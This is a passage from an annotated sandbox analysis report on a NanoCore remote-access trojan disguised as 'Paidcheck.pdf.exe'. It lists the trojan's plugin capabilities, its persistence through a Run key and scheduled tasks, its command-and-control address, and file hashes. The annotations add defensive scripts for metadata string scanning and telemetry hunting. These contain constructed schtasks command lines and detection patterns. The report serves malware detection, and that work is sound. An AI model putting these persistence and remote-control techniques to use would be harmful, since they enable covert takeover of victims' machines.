achineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
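The long runs above are the .NET metadata #Strings heap of each in-memory assembly with the NUL separators dropped by the report's string extractor: `<Module>` is always the first entry, and the namespace `NanoCore.ClientPluginHost` that the signature keys on is one of the entries. Read that way, the dumps enumerate the plugins loaded into RegAsm.exe and what each can do: ClientPlugin.dll (the host interfaces), NanoCoreBase.dll (OpenWebsite, MessageBox, CDTray, MouseSwap), FileBrowserClient (upload, download, delete, rename), NanoCoreStressTester (HTTPFlood, SlowLoris, SYNFlood, UDP) and MyClientPlugin.dll (DisableWebcamLights). The code below is an added example, not the sandbox's or the malware author's code: it parses an ECMA-335 metadata root to pull out the #Strings heap, splits the heap into identifiers, and matches the marker names quoted in the report. It also works on flattened text of the kind the report prints, where only substring matching is possible. The marker descriptions are this example's reading of the dumps; the metadata root it builds for itself is a constructed fixture, not bytes from the sample.

```python
"""Added example: find NanoCore plugin identifiers in a .NET #Strings heap."""
from __future__ import annotations

import struct

CLI_METADATA_SIGNATURE = 0x424A5342   # "BSJB", ECMA-335 II.24.2.1

# Identifiers copied from the report's string dumps; descriptions are this example's own.
NANOCORE_MARKERS = {
    "NanoCore.ClientPluginHost": "plugin host interface (referenced by every NanoCore plugin)",
    "ClientPlugin.dll": "plugin interface assembly",
    "NanoCoreBase.dll": "base plugin: OpenWebsite, MessageBox, CDTray, MouseSwap",
    "FileBrowserClient": "file browser plugin: upload, download, delete, rename",
    "NanoCoreStressTester": "DDoS plugin: HTTPFlood, SlowLoris, SYNFlood, UDP",
    "MyClientPlugin.dll": "misc plugin: DisableWebcamLights",
}


def parse_metadata_root(blob: bytes) -> dict[str, bytes]:
    """Parse a metadata root (what the CLI header's MetaData entry points at)
    and return {stream name: stream bytes}; layout per ECMA-335 II.24.2.1/2."""
    sig, _major, _minor, _reserved, ver_len = struct.unpack_from("<IHHII", blob, 0)
    if sig != CLI_METADATA_SIGNATURE:
        raise ValueError("not a CLI metadata root")
    off = 16 + ver_len                        # version string, already padded to 4 bytes
    _flags, nstreams = struct.unpack_from("<HH", blob, off)
    off += 4
    streams: dict[str, bytes] = {}
    for _ in range(nstreams):
        s_off, s_size = struct.unpack_from("<II", blob, off)
        off += 8
        end = blob.index(b"\x00", off)        # stream name: NUL-terminated ASCII ...
        name = blob[off:end].decode("ascii")
        off = (end + 1 + 3) & ~3              # ... padded to the next 4-byte boundary
        streams[name] = blob[s_off:s_off + s_size]
    return streams


def strings_heap_identifiers(heap: bytes) -> list[str]:
    """Split the #Strings heap into identifiers. Offset 0 is the empty string,
    so the first entry returned is normally "<Module>"."""
    return [s.decode("utf-8", "replace") for s in heap.split(b"\x00") if s]


def scan_identifiers(identifiers) -> dict[str, str]:
    """Exact match against parsed identifiers (memory dump path)."""
    present = set(identifiers)
    return {m: d for m, d in NANOCORE_MARKERS.items() if m in present}


def scan_flattened(text: str) -> dict[str, str]:
    """Substring match against NUL-stripped text, the form the report prints."""
    return {m: d for m, d in NANOCORE_MARKERS.items() if m in text}


def verdict(hits: dict[str, str]) -> str:
    """The host interface namespace is the anchor; plugin names only add capability detail."""
    return "nanocore" if "NanoCore.ClientPluginHost" in hits else "clean"


def build_metadata_root(strings_heap: bytes) -> bytes:
    """Constructed fixture: a minimal metadata root with a placeholder #~ stream
    and the given #Strings heap (not bytes from the analysed sample)."""
    version = b"v4.0.30319\x00"
    version += b"\x00" * (-len(version) % 4)

    def header_len(name: bytes) -> int:       # offset + size + NUL-padded name
        return 8 + ((len(name) + 1 + 3) & ~3)

    names = (b"#~", b"#Strings")
    tables = b"\x00" * 24
    off_tables = 16 + len(version) + 4 + sum(header_len(n) for n in names)
    off_strings = off_tables + len(tables)
    out = struct.pack("<IHHII", CLI_METADATA_SIGNATURE, 1, 1, 0, len(version)) + version
    out += struct.pack("<HH", 0, len(names))
    for name, s_off, s_size in ((names[0], off_tables, len(tables)),
                                (names[1], off_strings, len(strings_heap))):
        out += struct.pack("<II", s_off, s_size) + name.ljust(header_len(name) - 8, b"\x00")
    return out + tables + strings_heap


if __name__ == "__main__":
    # Constructed heap modelled on the report's dumps.
    heap = (b"\x00<Module>\x00mscorlib\x00Microsoft.VisualBasic\x00NanoCore.ClientPluginHost"
            b"\x00IClientNetworkHost\x00NanoCoreStressTester\x00HTTPFlood\x00SlowLoris\x00")
    streams = parse_metadata_root(build_metadata_root(heap))
    hits = scan_identifiers(strings_heap_identifiers(streams["#Strings"]))
    print(verdict(hits), sorted(hits))
```

On a real dump you would locate the metadata root through the CLR runtime header (data directory 14 of the PE) before calling parse_metadata_root; the heap path gives exact identifier matches, whereas the flattened path can false-positive on a longer name that merely contains a marker, which is why verdict() keys on the full namespace string rather than on plugin file names.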
Yara detected Nanocore RAT (same match list as under Stealing of Sensitive Information above)

Mitre Att&ck Matrix

Techniques the report marks for this sample, grouped by tactic. Only marked techniques are listed, with the report's hit-count marker in parentheses; the other cells of the matrix are unmarked template entries. No technique is marked under Initial Access, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects or Impact.

Execution: Windows Management Instrumentation (1); Scripting (111); Scheduled Task/Job (1); PowerShell (1)
Persistence: DLL Side-Loading (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (11)
Privilege Escalation: DLL Side-Loading (1); Process Injection (212); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (11)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Scripting (111); Obfuscated Files or Information (12); Software Packing (12); Timestomp (1); DLL Side-Loading (1); Masquerading (12); Virtualization/Sandbox Evasion (21); Process Injection (212)
Credential Access: Input Capture (21)
Discovery: System Time Discovery (1); File and Directory Discovery (1); System Information Discovery (13); Query Registry (1); Security Software Discovery (211); Process Discovery (2); Virtualization/Sandbox Evasion (21); Application Window Discovery (1)
Collection: Archive Collected Data (11); Input Capture (21)
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Remote Access Software (1); Application Layer Protocol (1)

Behavior Graph

Behavior Graph ID: 452385; Sample: Paidcheck.pdf.exe; Start date: 22/07/2021; Architecture: WINDOWS; Score: 100

Signatures attached to the sample node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures.

Process tree as drawn in the graph. Numbers in parentheses are the graph's counters for created registry values and created files, reproduced as displayed; file paths are abbreviated with "..." exactly as in the graph.

Paidcheck.pdf.exe (3 registry values, 9 files)
    dropped: C:\Users\user\AppData\...\explorerr.exe (PE32)
    dropped: C:\Users\user\AppData\Local\Temp\RegAsm.exe (PE32)
    dropped: C:\Users\...\explorerr.exe:Zone.Identifier (ASCII)
    dropped: 2 other malicious files
    signatures: Creates an undocumented autostart registry key; Writes to foreign memory regions; Injects a PE file into a foreign processes
    -> RegAsm.exe (1 registry value, 15 files)
        network: 217.138.212.57, ports 2018 and 49704 (M247GB, United Kingdom); 2018 is the remote port, 49704 is in the ephemeral range and is the local side of the connection
        dropped: C:\Users\user\AppData\Roaming\...\run.dat (Non-ISO)
        dropped: C:\Users\user\AppData\Local\...\tmp4FE3.tmp (XML)
        dropped: C:\Program Files (x86)\...\dhcpmon.exe (PE32)
        signature: Uses schtasks.exe or at.exe to add and modify task schedules
        -> schtasks.exe -> conhost.exe
        -> schtasks.exe -> conhost.exe
    -> wscript.exe (counter: 1)
        signature: Wscript starts Powershell (via cmd or directly)
        -> powershell.exe (counter: 25) -> conhost.exe
RegAsm.exe (second instance, drawn from the top-level node)
    dropped: C:\Users\user\AppData\...\RegAsm.exe.log (ASCII)
    -> conhost.exe
dhcpmon.exe -> conhost.exe
dhcpmon.exe -> conhost.exe

Screenshots

(Thumbnails of the analysis screenshots; the images are not part of this text export.)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Paidcheck.pdf.exe | 100% | Avira | HEUR/AGEN.1118541
Paidcheck.pdf.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe | 100% | Avira | HEUR/AGEN.1118541
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe | 33% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoBot
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | Virustotal |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | Metadefender |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\RegAsm.exe | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\RegAsm.exe | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\RegAsm.exe | 0% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
10.2.RegAsm.exe.5f60000.23.unpack | 100% | Avira | TR/NanoCore.fadte
10.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7

The 0% scores for the dropped RegAsm.exe and dhcpmon.exe are for the files as written to disk. The NanoCore payload is only detected once it is unpacked from the memory of RegAsm.exe (process 10 in the report's numbering, at the image base 0x400000 and at 0x5f60000), so on-disk scanning of the dropped host binaries is not a usable indicator for this sample.

      Domains

      No Antivirus matches

URLs

The report printed each URL once per reputation engine; identical rows are collapsed here.

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
217.138.212.57 | 1% | Virustotal |
217.138.212.57 | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://crl.microso | 0% | URL Reputation | safe
http://crl.microsofX | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://crl.micr | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

Apart from 217.138.212.57, none of these strings is an indicator for this sample. The foundry domains (tiro.com, carterandcone.com, sajatypeworks.com, typography.net, galapagosdesign.com, fontfabrik.com, founder.com.cn, jiyu-kobo.co.jp, sandoll.co.kr, urwpp.de, zhongyicts.com.cn, sakkal.com, goodfont.co.kr) are vendor URLs carried in the metadata of Windows font files mapped into the process; the crl.micr... and go.micro entries are truncated Microsoft URLs; trailing fragments such as bThe, coml, netD and DPlease are bytes adjacent to the URL in memory picked up by string carving. Do not block-list them.

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
annapro.linkpc.net | false | | high
217.138.212.57 | true | Virustotal 1%; Avira URL Cloud: safe | unknown

annapro.linkpc.net appears here although the report records no contacted domain and lists the domain of 217.138.212.57 as unknown, so the report itself does not tie the name to the IP. linkpc.net is a free dynamic-DNS domain, so the "high" reputation is that of the parent service rather than of this host name; track the host name together with the IP rather than reading the rating as a clean bill.

URLs from Memory and Binaries

Sources (memory dumps):
[A] Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp
[B] Paidcheck.pdf.exe, 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp
[C] RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp
[D] RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp
[E] powershell.exe, 0000000B.00000003.373704213.00000000055FF000.00000004.00000001.sdmp
[F] powershell.exe, 0000000B.00000003.376733884.0000000009675000.00000004.00000001.sdmp

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | [A] | false | | high
http://www.fontbureau.com | [A] | false | | high
http://www.fontbureau.com/designersG | [A] | false | | high
http://www.fontbureau.com/designers/? | [A] | false | | high
http://www.founder.com.cn/cn/bThe | [A] | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | [A] | false | | high
https://go.micro | [E] | false | URL Reputation: safe | unknown
http://www.tiro.com | [A] | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | [A] | false | | high
http://www.goodfont.co.kr | [A] | false | URL Reputation: safe | unknown
http://google.com | [C] | false | | high
http://www.carterandcone.coml | [A] | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | [A] | false | URL Reputation: safe | unknown
http://www.typography.netD | [A] | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | [A] | false | | high
http://www.founder.com.cn/cn/cThe | [A] | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | [A] | false | URL Reputation: safe | unknown
http://fontfabrik.com | [A] | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | [A] | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | [A] | false | | high
http://crl.microso | [D] | false | URL Reputation: safe | unknown
http://crl.microsofX | [D] | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | [A] | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | [A] | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | [A] | false | | high
http://www.fonts.com | [A] | false | | high
http://www.sandoll.co.kr | [A] | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | [A] | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | [A] | false | URL Reputation: safe | unknown
http://crl.micr | [F] | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | [B] | false | | high
http://www.sakkal.com | [A] | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
217.138.212.57 | unknown | United Kingdom | 9009 | M247GB | true

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:452385
                                Start date:22.07.2021
                                Start time:09:32:06
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 12m 44s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Paidcheck.pdf.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:26
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@20/24@0/1
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 13.2% (good quality ratio 11.2%)
                                • Quality average: 63.3%
                                • Quality standard deviation: 27.4%
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 101
                                • Number of non-executed functions: 6
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Not all processes were analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
09:32:57 | API Interceptor | 1x Sleep call for process: Paidcheck.pdf.exe modified
09:33:48 | Autostart | Run: key HKLM\Software\Microsoft\Windows\CurrentVersion\Run, value name "DHCP Monitor", data C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
09:33:50 | Task Scheduler | Run new task: DHCP Monitor, path: "C:\Users\user\AppData\Local\Temp\RegAsm.exe" s>$(Arg0)
09:33:51 | Task Scheduler | Run new task: DHCP Monitor Task, path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
09:34:11 | API Interceptor | 32x Sleep call for process: powershell.exe modified
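The persistence and C2 chain recorded in the Behavior Graph and in the Behavior and APIs rows above (RegAsm.exe copied to %TEMP% and used as the injection host, the "DHCP Monitor" Run value, the two schtasks tasks, dhcpmon.exe under Program Files (x86), TCP to 217.138.212.57:2018) expressed as hunting logic over host telemetry. This is an added example, not part of the Joe Sandbox report: the event records are constructed with Sysmon-style field names (EventID 1 process creation, 3 network connection, 13 registry value set), the schtasks /xml command-line form is assumed since the report gives only the task names and paths, and the rule names are the example's own.

```python
"""
Hunting logic for the persistence and C2 chain recorded in this report:
RegAsm.exe started from outside the .NET Framework directories, a Run value
named "DHCP Monitor", schtasks tasks "DHCP Monitor" / "DHCP Monitor Task",
dhcpmon.exe started from the DHCP Monitor directory under Program Files (x86),
and a TCP connection to 217.138.212.57:2018.

Added example, not part of the Joe Sandbox report. The events below are
CONSTRUCTED with Sysmon-style field names (EventID 1 = process creation,
3 = network connection, 13 = registry value set); the rule names are this
example's own.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators taken from the report.
C2_IP = "217.138.212.57"
C2_PORT = 2018
RUN_VALUE_NAME = "DHCP Monitor"
TASK_NAMES = {"DHCP Monitor", "DHCP Monitor Task"}
DROP_DIR = r"C:\Program Files (x86)\DHCP Monitor"

# A genuine RegAsm.exe lives only under the .NET Framework directories;
# the sample runs a copy dropped into %TEMP%.
LEGIT_REGASM = re.compile(
    r"^C:\\Windows\\Microsoft\.NET\\Framework(64)?\\v[\d.]+\\RegAsm\.exe$", re.I
)
# Captures the value name of a write under ...\CurrentVersion\Run\.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\([^\\]+)$", re.I)
# Captures the task name from a schtasks /tn "..." argument.
TASK_NAME_ARG = re.compile(r'/tn\s+"([^"]+)"', re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def check_event(ev: dict) -> list[Finding]:
    """Return the findings a single Sysmon-style event triggers (possibly none)."""
    findings: list[Finding] = []
    eid = ev["EventID"]
    if eid == 1:  # process creation
        image = ev.get("Image", "")
        cmdline = ev.get("CommandLine", "")
        if image.lower().endswith("\\regasm.exe") and not LEGIT_REGASM.match(image):
            findings.append(Finding("regasm_outside_dotnet", image))
        if image.lower().endswith("\\schtasks.exe"):
            m = TASK_NAME_ARG.search(cmdline)
            if m and m.group(1) in TASK_NAMES:
                findings.append(Finding("nanocore_task_name", m.group(1)))
        if image.lower().startswith(DROP_DIR.lower() + "\\"):
            findings.append(Finding("exec_from_drop_dir", image))
    elif eid == 13:  # registry value set
        m = RUN_KEY.search(ev.get("TargetObject", ""))
        if m and m.group(1) == RUN_VALUE_NAME:
            findings.append(Finding("nanocore_run_key", ev.get("Details", "")))
    elif eid == 3:  # network connection
        if ev.get("DestinationIp") == C2_IP and int(ev.get("DestinationPort", 0)) == C2_PORT:
            findings.append(Finding("nanocore_c2", f"{ev.get('Image', '')} -> {C2_IP}:{C2_PORT}"))
    return findings


def hunt(events) -> list[Finding]:
    """Run check_event over every event and collect all findings."""
    return [f for ev in events for f in check_event(ev)]


# Constructed events mirroring the report's process tree; not real logs.
# The /tn names are from the report; the /xml form of the command line is assumed.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\user\AppData\Local\Temp\RegAsm.exe",
     "ParentImage": r"C:\Users\user\Desktop\Paidcheck.pdf.exe", "CommandLine": ""},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": ""},  # benign: the real tool must not fire
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DHCP Monitor",
     "Details": DROP_DIR + r"\dhcpmon.exe"},
    {"EventID": 13, "TargetObject": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},  # benign
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp"'},
    {"EventID": 3, "Image": r"C:\Users\user\AppData\Local\Temp\RegAsm.exe",
     "DestinationIp": "217.138.212.57", "DestinationPort": 2018},
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "8.8.8.8", "DestinationPort": 53},  # benign
    {"EventID": 1, "Image": DROP_DIR + r"\dhcpmon.exe", "CommandLine": ""},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.rule:24} {f.detail}")
```

Of the four rules, the RegAsm.exe path check is the durable one: the Run value name, the task names and the C2 address are per-build settings that change with the next campaign, whereas a .NET RegAsm.exe starting anywhere except the Framework directories is abnormal on any host, and the report shows the on-disk copy scoring 0% with every scanner, so path is what catches it.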

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
217.138.212.57 | PO-110940,pdf.exe | malicious

Domains

No context

ASN

Match: M247GB

Associated Sample Name / URL | Detection | Contacted IP
List_to_clear_62237.xlsm | malicious | 5.61.62.219
List_to_clear_62237.xlsm | malicious | 5.61.62.219
87597.exe | malicious | 45.141.152.18
NJrrXRv8zV | malicious | 196.19.8.206
DpuO7oic9y.exe | malicious | 86.106.143.143
download.dat.exe | malicious | 194.187.251.163
WindowsFormsApp1.exe | malicious | 194.187.251.163
file2.exe | malicious | 141.98.102.243
Anarchy_Client.exe | malicious | 77.243.181.86
2N9Nc0H82F.exe | malicious | 37.120.206.86
VsaTool.exe | malicious | 185.156.172.76
UpdateTool.exe | malicious | 185.156.172.76
KaseyaFix2.exe | malicious | 185.156.172.76
Update[1].exe | malicious | 185.156.172.76
fpNebX354Y.exe | malicious | 185.156.172.76
fpNebX354Y.exe | malicious | 185.156.172.76
rz89FRwKvB.exe | malicious | 172.94.109.9
XH7Kdor28T.exe | malicious | 185.144.82.239
d7b.dll | malicious | 81.92.202.190
SecureMessageAtt.HTML | malicious | 45.141.152.18

JA3 Fingerprints

No context

Dropped Files

Match: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Associated Sample Name / URL | Detection
02_extracted.exe | malicious
Payment Order_PDF.vbs | malicious
Quotation.exe | malicious
DhStRngAC2.exe | malicious
1.exe | malicious
Img 06 30 2021 4677.exe | malicious
Purchase#20880.pdf.exe | malicious
2216DAF252B5F3B4B00238A097E0DF2A57C20780DCE0F.exe | malicious
pVOLEckzk1.exe | malicious
12ThYgKql3.exe | malicious
Invoice NeededPDF.exe | malicious
LKpLx8L8q9.exe | malicious
3y4JNjrN1C.exe | malicious
SecuriteInfo.com.Trojan.GenericKD.37108638.5946.exe | malicious
kYvdP38gUv.exe | malicious
qfjDTDPA9L.exe | malicious
wmaJOYGy7Q.exe | malicious
Trainer v22.3.exe | malicious
Trainer v 4.6.1.exe | malicious
PO 389293LC_pdf.exe | malicious

The identical dhcpmon.exe recurs in all twenty analyses above, every one classified malicious; that is the context in which to read the 0% scanner detections for that file and its "Malicious: false" flag in the file listing below.

                                                                          Created / dropped Files

                                                                          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):64616
                                                                          Entropy (8bit):6.037264560032456
                                                                          Encrypted:false
                                                                          SSDEEP:768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
                                                                          MD5:6FD7592411112729BF6B1F2F6C34899F
                                                                          SHA1:5E5C839726D6A43C478AB0B95DBF52136679F5EA
                                                                          SHA-256:FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
                                                                          SHA-512:21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
                                                                          Malicious:false
                                                                          Antivirus:
                                                                           • Antivirus: Virustotal, Detection: 0%
                                                                           • Antivirus: Metadefender, Detection: 0%
                                                                           • Antivirus: ReversingLabs, Detection: 0%
                                                                           Joe Sandbox View:
                                                                           • Filename: 02_extracted.exe, Detection: malicious
                                                                           • Filename: Payment Order_PDF.vbs, Detection: malicious
                                                                           • Filename: Quotation.exe, Detection: malicious
                                                                           • Filename: DhStRngAC2.exe, Detection: malicious
                                                                           • Filename: 1.exe, Detection: malicious
                                                                           • Filename: Img 06 30 2021 4677.exe, Detection: malicious
                                                                           • Filename: Purchase#20880.pdf.exe, Detection: malicious
                                                                           • Filename: 2216DAF252B5F3B4B00238A097E0DF2A57C20780DCE0F.exe, Detection: malicious
                                                                           • Filename: pVOLEckzk1.exe, Detection: malicious
                                                                           • Filename: 12ThYgKql3.exe, Detection: malicious
                                                                           • Filename: Invoice NeededPDF.exe, Detection: malicious
                                                                           • Filename: LKpLx8L8q9.exe, Detection: malicious
                                                                           • Filename: 3y4JNjrN1C.exe, Detection: malicious
                                                                           • Filename: SecuriteInfo.com.Trojan.GenericKD.37108638.5946.exe, Detection: malicious
                                                                           • Filename: kYvdP38gUv.exe, Detection: malicious
                                                                           • Filename: qfjDTDPA9L.exe, Detection: malicious
                                                                           • Filename: wmaJOYGy7Q.exe, Detection: malicious
                                                                           • Filename: Trainer v22.3.exe, Detection: malicious
                                                                           • Filename: Trainer v 4.6.1.exe, Detection: malicious
                                                                           • Filename: PO 389293LC_pdf.exe, Detection: malicious
